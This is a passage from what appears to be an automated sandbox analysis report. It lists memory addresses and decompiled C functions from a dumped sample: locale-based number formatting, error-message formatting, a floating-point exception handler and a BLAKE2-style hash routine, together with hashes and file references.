0x0102ce7f
0x00000000
0x0102ce81
0x0102ce81
0x0102ce84
0x0102ce86
0x0102ce86
0x0102ce94
0x0102ce97
0x0102ce9c
0x0102ce9e
0x00000000
0x00000000
0x0102cea0
0x0102cea7
0x0102cea7
0x0102ceaa
0x0102cead
0x0102ceb0
0x0102ceb3
0x0102ceb3
0x0102ceb6
0x0102ceb9
0x0102cebd
0x0102cec0
0x0102cec2
0x0102cec5
0x00000000
0x00000000
0x0102cec7
0x0102cec5
0x0102cea2
0x0102cea2
0x0102cea5
0x00000000
0x00000000
0x00000000
0x00000000
0x0102cea5
0x0102cecc
0x0102cecc
0x00000000
0x0102cecc
0x0102cec9
0x00000000
0x0102cec9
0x0102ce84
0x0102ce7f
0x0102cecf
0x0102cecf
0x0102ced1
0x0102cedb
0x0102cedb
0x0102cede
0x0102cee0
0x0102cee2
0x0102cee4
0x0102cee9
0x0102ceec
0x0102ceec
0x0102ceef
0x0102cef2
0x0102cef5
0x0102cef7
0x0102cf0c
0x0102cf0e
0x0102cf10
0x0102cf12
0x0102cf14
0x0102cf16
0x0102cf18
0x0102cf1a
0x0102cf1d
0x0102cf1d
0x0102cf21
0x0102cf23
0x0102cf29
0x0102cf2c
0x0102cf2c
0x0102cf2c
0x0102cf30
0x0102cf30
0x0102cf35
0x0102cf38
0x0102cf38
0x0102cf3d
0x0102cf3f
0x0102cf41
0x0102cf48
0x0102cf48
0x0102cf4a
0x0102cf4f
0x0102cf51
0x0102cf54
0x0102cf54
0x0102cf57
0x0102cf60
0x0102cf60
0x0102cf62
0x0102cf62
0x0102cf67
0x0102cf6d
0x0102cf71
0x0102cf74
0x0102cf77
0x0102cf79
0x0102cf79
0x0102cf79
0x0102cf7e
0x0102cf7e
0x0102cf81
0x0102cf84
0x0102cf43
0x0102cf43
0x0102cf46
0x00000000
0x00000000
0x0102cf46
0x0102cf41
0x0102cf8b
0x0102cf8b
0x0102cf8c
0x0102ced3
0x0102ced3
0x0102ced5
0x00000000
0x00000000
0x0102ced5
0x0102cf9c
0x0102cfa1
0x0102cfa4
0x0102cfa8
0x0102cfa9
0x0102cfac
0x0102cfaf
0x0102cfb0
0x0102cfb3
0x0102cfb6
0x0102cfb9
0x0102cfbc
0x0102cfbc
0x0102cfc4
0x0102cfcb
0x0102cfcc
0x0102cfce
0x0102cfd0
0x0102cfd2
0x0102cfd5
0x0102cfe0
0x0102cfe0
0x0102cfe6
0x0102cfe6
0x0102cfe9
0x0102cfea
0x0102cfea
0x0102cfe0
0x0102cfee
0x0102cff0
0x0102cff2
0x0102cff4
0x0102cff4
0x0102cff6
0x0102cffa
0x00000000
0x00000000
0x0102cffc
0x0102cffc
0x0102cfff
0x0102d001
0x00000000
0x00000000
0x00000000
0x0102d001
0x0102cff4
0x0102d003
0x0102d00d
0x00000000
0x00000000
0x00000000
0x0102cd18
0x0102cba2
0x0102cba2
0x0102cba2
0x0102cba5
0x0102cba8
0x0102cbab
0x0102cbdc
0x0102cbde
0x0102cc29
0x0102cc2b
0x0102cc32
0x0102cc39
0x0102cc3c
0x0102cc3f
0x0102cc45
0x0102cc45
0x0102cc46
0x0102cc49
0x0102cc50
0x0102cc59
0x0102cc5e
0x0102cc61
0x0102cc66
0x0102cc69
0x0102cc6b
0x0102cc70
0x0102cc73
0x0102cc76
0x0102cc76
0x0102cc76
0x0102cc7a
0x0102cc7d
0x0102cc7d
0x0102cc82
0x0102cc82
0x0102cc8d
0x0102cc98
0x0102cc98
0x0102cc9b
0x0102cca7
0x0102ccac
0x0102ccb7
0x0102ccb9
0x0102ccbb
0x0102ccc1
0x0102ccc6
0x0102ccc8
0x0102ccce
0x0102cbe0
0x0102cbec
0x0102cbec
0x0102cbef
0x0102cbff
0x0102cc05
0x0102cc0c
0x0102cc0e
0x0102cc16
0x0102cc18
0x0102cc1a
0x0102cc1f
0x0102cc22
0x0102cc28
0x0102cc28
0x0102cbad
0x0102cbb0
0x0102cbb4
0x0102cbba
0x0102cbc9
0x0102cbd3
0x0102cbdb
0x0102cbdb
0x0102cbab
0x0102cb86
0x0102cb89
0x0102cb8f
0x0102cb8f
0x0102cb75
0x0102cb7b
0x0102cb7b

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: 23de9df3481e82ef89a4f72a8e9146a2e6e9a2bac07e97cfac670737f1c28ea6
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: 82023E71E001299BEF55CFA9C9806ADFBF1FF48314F2542AAD959E7344D731AA41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0101A63C, Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101A63C(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x103e610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x105eca8 = _v304;
					 *0x105ecaa = 0;
					 *0x103e610 = 0x105eca8;
				}
				E0100FD25(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x103e600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x0101a654
0x0101a662
0x0101a66f
0x0101a677
0x0101a67d
0x0101a67d
0x0101a693
0x0101a698
0x0101a69d
0x0101a6a7
0x0101a6b1
0x0101a6b9
0x0101a6c4

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101A662
GetNumberFormatW.KERNEL32 ref: 0101A6B1

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 5609b4b8c4d4d9ac231986da7e6d16a1e4e008c77face8fbcaebcf8253aa541c
Instruction ID: 3a45c779b4720f84c4bacb8a98d2f0c610d32c61ed5104cdff9e7ea91067feb9
Opcode Fuzzy Hash: 5609b4b8c4d4d9ac231986da7e6d16a1e4e008c77face8fbcaebcf8253aa541c
Instruction Fuzzy Hash: 97015E3650030DBBD720DF65EC45F9BB7BCEF49710F004562BA8497144D3759A25C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 01006EC9, Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E01006EC9(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x01006ec9
0x01006ed1
0x00000000
0x01006ef8
0x01006eea
0x01006ef2
0x00000000

APIs

GetLastError.KERNEL32(0101117C,?,00000200), ref: 01006EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 01006EEA

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 85070edcc65678b9b84a68a02af1fa54deb5512fb6fcb53cf2ab7412b4d45bcb
Instruction ID: 8dcab015bfb64d511465de685ab449e14e18dc8c05734b2132562c362a5ffe47
Opcode Fuzzy Hash: 85070edcc65678b9b84a68a02af1fa54deb5512fb6fcb53cf2ab7412b4d45bcb
Instruction Fuzzy Hash: B9D0C7313C4302BFFA610A74CC45F2B7F957755B42F108524B396DD0D0C57694249715

Uniqueness

Uniqueness Score: -1.00%

Function 01031194, Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E01031194(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0102EAF2(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0102EA58(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x010311a2
0x010311a9
0x010311ae
0x010311b4
0x010311b7
0x010311bd
0x010311c2
0x010311c7
0x010311c7
0x010311cd
0x010311d2
0x010311d7
0x010311d7
0x010311de
0x010311e3
0x010311e8
0x010311e8
0x010311ef
0x010311f4
0x010311f9
0x010311f9
0x01031200
0x01031205
0x0103120a
0x0103120a
0x01031212
0x01031222
0x01031234
0x01031246
0x01031259
0x0103126b
0x01031273
0x01031278
0x0103127d
0x0103127d
0x01031284
0x01031289
0x01031289
0x01031290
0x01031295
0x01031295
0x0103129c
0x010312a1
0x010312a1
0x010312a8
0x010312ad
0x010312ad
0x010312b7
0x010312b9
0x010312f3
0x010312bb
0x010312c0
0x010312e4
0x010312ec
0x010312e0
0x010312e0
0x010312f6
0x010312fd
0x010312ff
0x01031321
0x01031329
0x0103132c
0x0103132c
0x0103132e
0x0103132e
0x01031339
0x0103133f
0x01031344
0x0103134b
0x01031385
0x01031390
0x01031396
0x01031399
0x0103139c
0x010313a8
0x010313b0
0x0103134d
0x01031350
0x0103135c
0x01031362
0x01031368
0x0103136b
0x01031374
0x01031374
0x010313b3
0x010313c1
0x010313c7
0x010313ce
0x010313d0
0x010313d0
0x010313d7
0x010313d9
0x010313d9
0x010313e0
0x010313e2
0x010313e2
0x010313e9
0x010313eb
0x010313eb
0x010313f2
0x010313f4
0x010313f4
0x01031401
0x01031404
0x0103143b
0x01031406
0x01031406
0x01031409
0x01031434
0x01031429
0x01031429
0x0103143d
0x01031445
0x01031448
0x01031467
0x0103146c
0x0103146c
0x0103146e
0x01031473
0x0103147f
0x01031475
0x01031478
0x01031478
0x01031484
0x01031484
0x0103144a
0x0103144d
0x0103145c
0x00000000
0x0103145c
0x0103144f
0x01031452
0x01031454
0x01031454
0x00000000
0x01031452
0x0103140b
0x0103140e
0x01031424
0x00000000
0x01031424
0x01031413
0x01031415
0x01031415
0x01031413
0x00000000
0x01031404
0x01031306
0x01031314
0x0103131c
0x00000000
0x0103131c
0x0103130a
0x0103130f
0x0103130f
0x00000000
0x0103130a
0x010312c7
0x010312d5
0x010312dd
0x00000000
0x010312dd
0x010312cb
0x010312d0
0x010312d0
0x010312cb

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0103118F,?,?,00000008,?,?,01030E2F,00000000), ref: 010313C1

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ef17b6cd9b90dfa2e358501bde05c690ebf75c532da6e41eca607893b219116d
Instruction ID: afbf268b1666411194f96d46c81e0696df602c945ee2871ae8188e7ffb770fac
Opcode Fuzzy Hash: ef17b6cd9b90dfa2e358501bde05c690ebf75c532da6e41eca607893b219116d
Instruction Fuzzy Hash: 3DB179712106088FE715CF2CC48AB657BE4FF89364F258698E9D9CF2A1C735E992CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0100407E, Relevance: 1.6, Strings: 1, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0100407E() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0x1033680; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0x1033681; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x1033682; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0x1033683; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x1033684; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0x1033685; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0x1033686; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0x1033687; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0x1033688; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0x1033689; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0x103368a; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
